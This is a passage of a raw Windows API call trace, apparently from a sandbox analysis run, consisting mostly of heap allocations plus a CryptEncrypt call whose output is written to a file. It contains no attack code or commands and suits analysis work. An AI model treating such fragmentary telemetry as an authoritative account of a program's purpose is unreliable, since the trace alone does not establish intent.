(HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0126.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0126.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0126.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0126.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0126.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0126.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0126.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0126.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0126.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0126.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xff62) returned 0x48f0048 [0126.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0126.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xff62) returned 0x48fffb8 [0126.048] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.048] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0126.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0126.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0126.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0126.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0126.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cae80 [0126.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0126.048] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49d9e60*, pdwDataLen=0x144e790*=0xff62, dwBufLen=0xff70 | out: pbData=0x49d9e60*, pdwDataLen=0x144e790*=0xff70) returned 1 [0126.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0126.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0126.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0126.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0126.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0126.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0126.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0126.049] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0126.049] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0126.049] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.050] WriteFile (in: hFile=0x258, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0xff70, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144f194*=0xff70, lpOverlapped=0x0) returned 1 [0126.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0126.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0126.054] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0126.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0126.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0126.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0126.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0126.054] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0126.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0126.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0126.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0126.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0126.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0126.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0126.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0126.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0126.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0126.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0126.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0126.055] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0126.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0126.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28d0 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0126.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0126.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0126.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0126.056] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0126.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0126.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0126.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0126.056] PeekMessageW (in: lpMsg=0x144e96c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e96c) returned 0 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0126.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0126.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0126.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0126.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0126.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0126.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0126.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0126.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0126.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0126.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0126.057] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0126.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0126.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0126.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0126.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0126.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0126.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0126.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0126.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0126.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0126.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0126.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0126.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0126.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0126.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0126.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0126.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0126.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0126.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0126.059] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0126.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0126.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0126.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0126.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0126.059] CryptDestroyKey (hKey=0x41ac140) returned 1 [0126.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0126.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0126.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0126.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0126.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0126.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0126.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0126.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0126.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0126.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0126.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0126.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0126.060] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0126.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0126.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0126.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0126.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0126.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0126.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0126.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0126.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0126.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0126.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0126.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0126.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0126.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0126.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0126.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0126.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0126.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0126.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0126.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0126.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0126.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0126.061] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0126.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0126.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0126.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0126.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0126.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0126.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.062] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0126.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0126.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0126.062] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0126.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0126.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0126.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0126.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0126.062] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0126.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0126.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392688 